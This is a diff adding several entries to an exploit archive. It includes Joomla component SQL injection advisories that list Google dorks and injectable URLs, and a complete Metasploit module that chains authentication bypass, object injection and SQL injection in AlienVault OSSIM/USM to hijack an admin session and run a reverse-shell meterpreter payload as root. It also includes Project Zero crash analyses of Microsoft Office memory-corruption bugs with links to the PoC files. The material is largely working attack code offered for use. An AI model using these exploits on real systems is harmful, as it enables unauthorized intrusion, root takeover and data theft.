# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
# # # # #

18
platforms/php/webapps/41408.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component J-MultipleHotelReservation Standard v6.0.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jcruisereservation
# Date: 21.02.2017
# Vendor Homepage: http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/joomla_multi_hotel_reservation_standard
# Demo: http://hoteldemo.cmsjunkie.com/j3/multiple_standard/
# Version: 6.0.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
# Etc...
# # # # #

17
platforms/php/webapps/41409.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Directorix Directory Manager v1.1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_directorix
# Date: 21.02.2017
# Vendor Homepage: http://informafix.fr/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/address-book/directorix-directory-manager/
# Demo: http://demo.informafix.fr/index.php?option=com_directorix
# Version: 1.1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_directorix&view=entriessearch&search_categories[]=[SQL]
# # # # #

19
platforms/php/webapps/41410.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Magic Deals Web v1.2.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_magicdealsweb
# Date: 21.02.2017
# Vendor Homepage: http://jasonwebdesign.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/magic-deals-web/
# Demo: http://magicdealsweb.jasonwebdesign.com/
# Version: 1.2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?filterbycats=all&fullordering=[SQL]&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
# http://localhost/[PATH]/index.php?filterbycats=[SQL]=final_price+DESC&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
# http://localhost/[PATH]/index.php/component/magicdealsweb/?option=com_magicdealsweb&view=search&search_in=11&q=[SQL]
# # # # #

19
platforms/php/webapps/41411.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_jbusinessdirectory
# Date: 21.02.2017
# Vendor Homepage: http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
# Version: 4.6.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
# Etc...
# # # # #

18
platforms/php/webapps/41412.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component AppointmentBookingPro v4.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_rsappt_pro3
# Date: 21.02.2017
# Vendor Homepage: http://appointmentbookingpro.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/appointmentbookingpro/
# Demo: http://demo.appointmentbookingpro.com/
# Version: 4.0.1 / 4.0.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL]
# http://localhost/[PATH]/index.php?option=com_rsappt_pro3&view=resourceslist&tags=[SQL]
# # # # #

322
platforms/php/webapps/41424.rb Executable file
View file

@ -0,0 +1,322 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault OSSIM/USM Remote Code Execution",
'Description' => %q{
This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together.
Unauthenticated users can execute arbitrary commands under the context of the root user.
By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
action and policy that enables to execute operating system commands by using captured session token. As a final step,
SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
operating system command with root user privileges.
This module was tested against following product and versions:
AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
AlienVault OSSIM 5.0.0, 4.6.1
},
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Lapp', # EDB advisory owner
'Mehmet Ince <mehmet@mehmetince.net>' # Metasploit module
],
'References' =>
[
['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
['EDB', '40682']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 10,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' =>
[
['Alienvault USM/OSSIM <= 5.3.0', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jan 31 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)
end
def check
r = rand_text_alpha(15)
p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
'headers' => {
'User-Agent' => 'AV Report Scheduler',
},
'vars_get' => {
'type' => 'alarm',
'wtype' => 'foo',
'asset' => 'ALL_ASSETS',
'height' => 1,
'value' => p
}
})
if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
# Hijacking Administrator session by exploiting objection injection vuln that end up with sqli
print_status("Hijacking administrator session")
sql = "SELECT id FROM sessions LIMIT 1"
p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
'headers' => {
'X-Forwarded-For' => rhost.to_s,
'User-Agent' => 'AV Report Scheduler',
},
'vars_get' => {
'type' => 'alarm',
'wtype' => 'foo',
'asset' => 'ALL_ASSETS',
'height' => 1,
'value' => p
}
})
if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
admin_session = $1
cookie = "PHPSESSID=#{admin_session}"
print_good("Admin session token : #{cookie}")
else
fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
end
# Creating a Action that contains payload.
print_status("Creating rogue action")
r = rand_text_alpha(15)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_post' => {
'id' => '',
'action' => 'new',
'old_name' => '',
'action_name' => r,
'ctx' => '',
'old_descr' => '',
'descr' => r,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'email_from' => '',
'email_to' => 'email;email;email',
'email_subject' => '',
'email_message' => '',
'transferred_user' => '',
'transferred_entity' => '',
'exec_command' => "python -c \"#{payload.encoded}\""
}
})
if res && res.code == 200 && res.body.include?("Action successfully updated")
print_good("Action created: #{r}")
else
fail_with(Failure::Unknown, "Unable to create action")
end
# Retrieving the policy id. Authentication Bypass with User-Agent Doesn't work for this endpoint.
# Thus we're using hijacked administrator session.
print_status("Retrieving rogue action id")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
action_id = $1
print_good("Corresponding Action ID found: #{action_id}")
else
fail_with(Failure::Unknown, "Unable to retrieve action id")
end
# Retrieving the policy data. We will use it while creating policy
print_status("Retrieving policy ctx and group values")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'
}
})
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_good("CTX Value found: #{policy_ctx}")
print_good("GROUP Value found: #{policy_group}")
else
fail_with(Failure::Unknown, "Unable to retrieve policy data")
end
# Creating policy that will be trigerred when SSH authentication failed due to wrong password.
print_status("Creating a policy that uses our rogue action")
policy = rand_text_alpha(15)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1',
'action' => 'new',
'sources[]' => '00000000000000000000000000000000',
'dests[]' => '00000000000000000000000000000000',
'portsrc[]' => '0',
'portdst[]' => '0',
'plug_type' => '1',
'plugins[0]' => 'on',
'taxfilters[]' =>'25@2@0',
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Istanbul',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0',
'cross_correlate' => '0',
'store' => '0'
}
})
if res && res.code == 200
print_good("Policy created: #{policy}")
else
fail_with(Failure::Unknown, "Unable to create policy id")
end
# We gotta reload all policies in order to make our rogue one enabled.
print_status("Activating the policy")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_good("Rogue policy activated")
else
fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
end
# We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-)
factory = ssh_socket_factory
opts = {
auth_methods: ['password'],
port: 22,
use_agent: false,
config: false,
password: rand_text_alpha(15),
proxy: factory,
non_interactive: true
}
print_status("Triggering the policy by performing SSH login attempt")
begin
Net::SSH.start(rhost, "root", opts)
rescue Net::SSH::AuthenticationFailed
print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
rescue Net::SSH::Exception => e
print_error("SSH Error: #{e.class} : #{e.message}")
return nil
end
end
end

83
platforms/windows/dos/41417.txt Executable file
View file

@ -0,0 +1,83 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=949
Platform: Microsoft Office 2010 on Windows 7 x86
Class: heap memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash appeared to be non-deterministic depending on memory layout and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
Attached files:
2581805226.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
riched20.dll: 14.0.7155.5000
msptls.dll: 14.0.7164.5000
((7ac.a64): Access violation - code c0000005 (first chance)
eax=200bcf3a ebx=1febce30 ecx=1febce2c edx=77cf6b01 esi=1febce34 edi=1febce18
eip=66a19941 esp=0027008c ebp=002700d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal5429+0x376:
66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a1993c 8b4104 mov eax,dword ptr [ecx+4] ; Length 0x00200122
66a1993f 03c7 add eax,edi
=> 66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a19944 894dfc mov dword ptr [ebp-4],ecx
66a19947 8a55fd mov dl,byte ptr [ebp-3]
66a1994a 8855fc mov byte ptr [ebp-4],dl
66a1994d 884dfd mov byte ptr [ebp-3],cl
66a19950 66837dfc04 cmp word ptr [ebp-4],4
66a19955 0f85e0010000 jne mso!Ordinal5429+0x570 (66a19b3b)
66a1995b 8a08 mov cl,byte ptr [eax]
66a1995d 8a5001 mov dl,byte ptr [eax+1]
66a19960 8810 mov byte ptr [eax],dl
66a19962 884801 mov byte ptr [eax+1],cl
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
002700d8 66a19527 20099000 0000c000 2e010b53 mso!Ordinal5429+0x376
002701ac 66a19348 1febefa0 042109c7 042109c7 mso!Ordinal10199+0x2138
002701c8 66a192a9 00270240 042109c7 00000001 mso!Ordinal10199+0x1f59
00270288 66a18c32 042109c7 0027038c 00000004 mso!Ordinal10199+0x1eba
00270474 66a18bb5 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x1843
00270498 6b256c34 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x17c6
002704bc 6b2570e0 042109c7 1feeaff8 00000002 gfx!Ordinal980+0xa2
00270570 6b256bd4 0b558dc8 1feeaff8 00000002 gfx!Ordinal818+0x306
002705bc 67821180 002705fc 1feeaff8 00000002 gfx!Ordinal980+0x42
0027061c 67820b5a 00000002 1ba92e18 1feeaff8 oart!Ordinal2842+0xb6c
00270690 6781fed8 00000000 001f2ff0 00270924 oart!Ordinal2842+0x546
002706e0 61c2000c 00270724 00000000 00000000 oart!Ordinal7653+0x7d3
00270878 61c1f736 002708a8 00000000 00000064 riched20!RichListBoxWndProc+0x50da
002708b0 61c1edb1 00000000 0000ffff 00000000 riched20!RichListBoxWndProc+0x4804
002709a0 61c1e7ba 00000000 00000001 00000000 riched20!RichListBoxWndProc+0x3e7f
002709d4 6aa75d8c 0a7c1c38 00000000 00000000 riched20!RichListBoxWndProc+0x3888
00270a54 6aa6ef12 1f9b4ef8 00000000 00270c2c MSPTLS!LssbFIsSublineEmpty+0x16269
00270c5c 6aa54c98 0a7c3a78 00000000 00004524 MSPTLS!LssbFIsSublineEmpty+0xf3ef
00270c90 61c1c803 0a7c3a78 00000000 00004524 MSPTLS!LsCreateLine+0x23
00270db0 61c1c659 00000003 00000000 ffffffff riched20!RichListBoxWndProc+0x18d1
00270e08 61c0f36a 00271770 00000003 00000000 riched20!RichListBoxWndProc+0x1727
In this crash eax is pointing to an invalid memory region and is being dereferenced causing an access violation. There is a clear path to an out of bounds memory write shortly after the current crashing instruction. The value in eax came from edi + [ecx+4]. The value in [ecx+4] appears to a length with a single bit flipped, 0x00200122 instead of 0x00000122. The heap chunk allocated for this came from:
0:000> !heap -p -a 0x1febce18
address 1febce18 found in
_DPH_HEAP_ROOT @ 71000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1feb171c: 1febce18 1e2 - 1febc000 2000
6eac8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77d7616e ntdll!RtlDebugAllocateHeap+0x00000030
77d3a08b ntdll!RtlpAllocateHeap+0x000000c4
77d05920 ntdll!RtlAllocateHeap+0x0000023a
6fcdad1a vrfcore!VerifierSetAPIClassName+0x000000aa
6fc816ac vfbasics+0x000116ac
67080c59 mso!Ordinal9770+0x000078e2
66a19527 mso!Ordinal10199+0x00002138
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41417.zip

116
platforms/windows/dos/41418.txt Executable file
View file

@ -0,0 +1,116 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=950
Platform: Microsoft Office 2010 on Windows 7 x86
Class: Time of check time of use leading to memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash is non-deterministic and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
Attached files:
910494862.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
oart.dll: 14.0.7169.5000
ppcore.dll: 14.0.7173.5000
(510.66c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1a6f0fb0 ebx=3c782fc4 ecx=1a53cfe0 edx=000004bf esi=1a53cfe0 edi=1a4d6fc0
eip=66acdf93 esp=0013d8b0 ebp=0013d8bc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
mso!Ordinal4899+0xd33:
66acdf93 f6465804 test byte ptr [esi+58h],4 ds:0023:1a53d038=??
0:000> uf 0x66acdf8b
mso!Ordinal4899+0xd2b:
66acdf8b 55 push ebp
66acdf8c 8bec mov ebp,esp
66acdf8e 51 push ecx
66acdf8f 51 push ecx
66acdf90 56 push esi
66acdf91 8bf1 mov esi,ecx
=> 66acdf93 f6465804 test byte ptr [esi+58h],4
Call Stack:
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0013d8bc 66ba7720 00000000 1a9d6f98 66ad3d33 mso!Ordinal4899+0xd33
0013d948 67908f0d 1a996e30 1a9d6f98 0000001a mso!Ordinal4720+0x201
0013d980 67906400 0013d9fc 679063f4 0013d9fc oart!Ordinal7979+0x35
0013d994 67908f30 2cccaf58 0013d9fc 0013d9cc oart!Ordinal2490+0x10b
0013d9a4 677e2a14 0013d9fc 1a4d6fd8 1a984ff0 oart!Ordinal7979+0x58
0013d9cc 677e2999 1a4d6ff0 0013d9fc 0013da0c oart!Ordinal6+0xc4
0013d9dc 6788730f 0013d9fc 3a5fe1a5 1a554f8c oart!Ordinal6+0x49
0013da0c 68c8e465 3c782fc4 3a5ff871 68b7e504 oart!Ordinal1989+0xaa
0013da44 68c985dd 3a5fc635 0013e4b4 68b8661c ppcore!PPMain+0x9130c
0013e400 68d0540f 00000000 3c886ea0 00000001 ppcore!PPMain+0x9b484
In this crash the pointer being dereferenced in esi is being tested for a flag value. However, the pointer is referencing invalid memory generating an access violation. The esi value came from the ecx register which is presumably the this pointer. Previous chunk at esi-0x58 is valid memory but 0x58 is beyond that allocated size of that chunk:
0:000> !heap -p -a 19841038
address 19841038 found in
_DPH_HEAP_ROOT @ 11a1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
197f1d9c: 19840fe0 20 - 19840000 2000
70588e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
778c616e ntdll!RtlDebugAllocateHeap+0x00000030
7788a08b ntdll!RtlpAllocateHeap+0x000000c4
77855920 ntdll!RtlAllocateHeap+0x0000023a
710ead1a vrfcore!VerifierSetAPIClassName+0x000000aa
6d7b16ac vfbasics+0x000116ac
60b20233 mso!Ordinal9052+0x0000713f
67808744 oart!Ordinal2033+0x00000090
678086ab oart!Ordinal6561+0x000000ac
6781af9f oart!Ordinal5870+0x00000060
Looking at the calling function:
0:000> uf 0x66ba76ef
mso!Ordinal4720+0x1d0:
66ba76ef 56 push esi
66ba76f0 8bf1 mov esi,ecx
66ba76f2 e8a7ddfaff call mso!Ordinal8038+0x461 (66b5549e) ; first call
66ba76f7 85c0 test eax,eax
66ba76f9 7427 je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1dc:
66ba76fb 8bce mov ecx,esi
66ba76fd e89cddfaff call mso!Ordinal8038+0x461 (66b5549e) ; second call
66ba7702 83781400 cmp dword ptr [eax+14h],0
66ba7706 741a je mso!Ordinal4720+0x203 (66ba7722)
mso!Ordinal4720+0x1e9:
66ba7708 8bce mov ecx,esi
66ba770a e88fddfaff call mso!Ordinal8038+0x461 (66b5549e) ; third call
66ba770f 8b4014 mov eax,dword ptr [eax+14h]
66ba7712 8b4810 mov ecx,dword ptr [eax+10h] ; crashing ecx value
66ba7715 85c9 test ecx,ecx
66ba7717 7413 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x1fa:
66ba7719 6a00 push 0
66ba771b e86b68f2ff call mso!Ordinal4899+0xd2b (66acdf8b) ; crashing function
66ba7720 5e pop esi
66ba7721 c3 ret
mso!Ordinal4720+0x203:
66ba7722 f6465804 test byte ptr [esi+58h],4 ; same check as crashing function
66ba7726 7404 je mso!Ordinal4720+0x20d (66ba772c)
mso!Ordinal4720+0x209:
66ba7728 8bce mov ecx,esi
66ba772a ebed jmp mso!Ordinal4720+0x1fa (66ba7719)
mso!Ordinal4720+0x20d:
66ba772c b8ff0f0000 mov eax,0FFFh
66ba7731 5e pop esi
66ba7732 c3 ret
Looking at the logic flow from this function we see at the very first call to mso!Ordinal8038+0x461 must return a non-null value or else the same check in the crashing function is performed in the calling function. With a non-null return this same function is called again only this time the value at [eax+0x14h] is checked to be non-null. If this second check passed then the we call the same function a third time! This time we follow the pointer at [[eax+0x14]+0x10] and check it to be non-null before passing it to the crashing function. Given the repeating calls to the same function and the non-determinism of the bug I suspect this is a time of check time of use bug on the object implementing these methods.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41418.zip

75
platforms/windows/dos/41419.txt Executable file
View file

@ -0,0 +1,75 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=951
Platform: GDI on Windows 7 x86 reachable from Microsoft Office 2010
Class: Out of bounds memory access
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled.
Attached files:
2167705722.ppt: fuzzed crashing file
File versions:
gdi32.dll: 6.1.7601.23457
gdiplus.dll: 6.1.7601.23508
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
(788.ca0): Access violation - code c0000005 (first chance)
eax=00000000 ebx=0747bc5c ecx=00000001 edx=16ab9fd8 esi=1c45dcb8 edi=223e3000
eip=77667a68 esp=1c45dc78 ebp=1c45dc84 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
GDI32!ConvertDxArray+0x3c:
77667a68 8b07 mov eax,dword ptr [edi] ds:0023:223e3000=????????
0:014> kb
ChildEBP RetAddr Args to Child
1c45dc84 7765a2b3 000003a8 0747bc5c 223e2ff0 GDI32!ConvertDxArray+0x3c
1c45e6dc 776442e7 1f210a94 0000001b 00000093 GDI32!MF_ExtTextOut+0x3b4
1c45ec48 776405dc 1f210a94 0000001b 00000093 GDI32!ExtTextOutInternalA+0x156
1c45ec74 7764969c 1f210a94 0000001b 00000093 GDI32!ExtTextOutA+0x24
1c45ed5c 7764e40f 1f210a94 0ab42fc8 0747bc42 GDI32!PlayMetaFileRecord+0x1bc7
1c45ede0 7764e441 21464dc0 0000000c 00000000 GDI32!CommonEnumMetaFile+0x24d
1c45edf8 741fb1c0 1f210a94 2a260a92 7764438a GDI32!PlayMetaFile+0x1f
1c45ee60 741fb65b 2a260a92 43b405d9 46123597 GdiPlus!GetEmfFromWmfData+0x420
1c45ee84 741fb768 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::InitWmf+0xb2
1c45eea0 741fea9f 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::GpMetafile+0x3b
1c45eef8 741ff642 19a0cd28 1c45efbc 00000000 GdiPlus!GpMetafile::ConvertToEmfPlus+0x79
1c45ef1c 741d4fc2 19a0cd28 1c45efbc 00000004 GdiPlus!GpMetafile::ConvertToEmfPlus+0x1d
1c45ef58 6b388b58 19a0cd28 1999ef28 1c45efbc GdiPlus!GdipConvertToEmfPlus+0xbf
1c45efd4 6b36f2f4 19a0cd28 00000000 1fd76f56 gfx!Ordinal841+0x12250
1c45f004 678980c2 1c45f07c 1c45f024 1fd75519 gfx!Ordinal745+0x34
1c45f090 67897d68 1c45f0e8 07430f28 21408fe0 oart!Ordinal7931+0x6d0
1c45f104 677e340d 07430f28 1c45f124 67805b69 oart!Ordinal7931+0x376
1c45f110 67805b69 1c45f2c8 1c45f1b0 6b24cceb oart!Ordinal3235+0x14a
The function GDI32!ConvertDxArray is called with codepage 936 (ANSI/OEM Simplified Chinese [PRC, Singapore]; Chinese Simplified [GB2312]) a length of 4 (DWORDs) and a source contents containing 0x00000010 0x00000000 0x00000010 0x00000000. There are two paths in this function, one that operates on 4 byte boundaries and one that operates on 8 byte boundaries depending on the last argument where true indicates an 8-byte boundary and false indicates a 4-byte boundary. Both paths have the same issue. Pseudocode for one path in the function is:
...
else if ( (unsigned int)current < result )
{
cur_dest = (unsigned int *)dest;
cur_src = (unsigned int *)src;
do
{
dbcs_ret = IsDBCSLeadByteEx(CodePage, *current++);
dbcs_flag = dbcs_ret == 0;
tmp = *cur_src;
*cur_dest = tmp;
if ( !dbcs_flag )
{
++cur_src;
tmp = *cur_src; // crash here
++current;
*cur_dest += tmp;
}
++cur_src;
++cur_dest;
}
while ( (unsigned int)current < end );
}
The issue here is that when dbcs_flag is false the 4 byte boundary version can actually process 8 bytes of the source buffer (cur_src is incremented twice) and the 8 byte version is capable of processing 16 bytes per iteration. The length checks in this function do not verify this behavior to be in bounds. However, the most likely exploitation scenario will be a memory disclosure because cur_dest is not written to out of bounds. The value in tmp is instead added to the contents of cur_dest.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41419.zip